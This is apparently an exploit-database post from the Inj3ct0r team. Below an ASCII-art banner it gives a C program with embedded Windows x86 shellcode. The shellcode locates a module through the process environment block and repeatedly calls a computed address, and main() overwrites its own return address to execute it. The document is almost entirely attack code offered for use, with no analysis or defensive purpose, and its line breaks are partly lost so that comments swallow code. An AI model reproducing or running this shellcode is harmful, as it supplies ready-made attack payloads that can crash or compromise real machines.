|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################## 1 0 I'm agix member from Inj3ct0r Team 1 1 ################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#include <stdio.h>
char shellcode[] =
"\x31\xC9" //xor ecx, ecx "\x64\x8B\x71\x30" //mov esi, [fs:ecx+0x30] "\x8B\x76\x0C" //mov esi, [esi+0x0C] "\x8B\x76\x1C" //mov esi, [esi+0x1c] "\x8B\x06" //mov eax, [esi] "\x8B\x68\x08" //mov ebp, [eax+0x08] "\x68\x11\x11\x11\x11" //push 0x11111111 "\x66\x68\x11\x11" //push word 0x1111 "\x5B" //pop ebx "\x53" //push ebx "\x55" //push ebp "\x5B" //pop ebx "\x66\x81\xC3\x4B\x85" //add bx, 0x854b "\xFF\xD3" //call ebx "\xEB\xEA"; //jmp short
int main(int argc, char **argv) { int *ret; ret = (int *)&ret + 2; (*ret) = (int) shellcode; }
|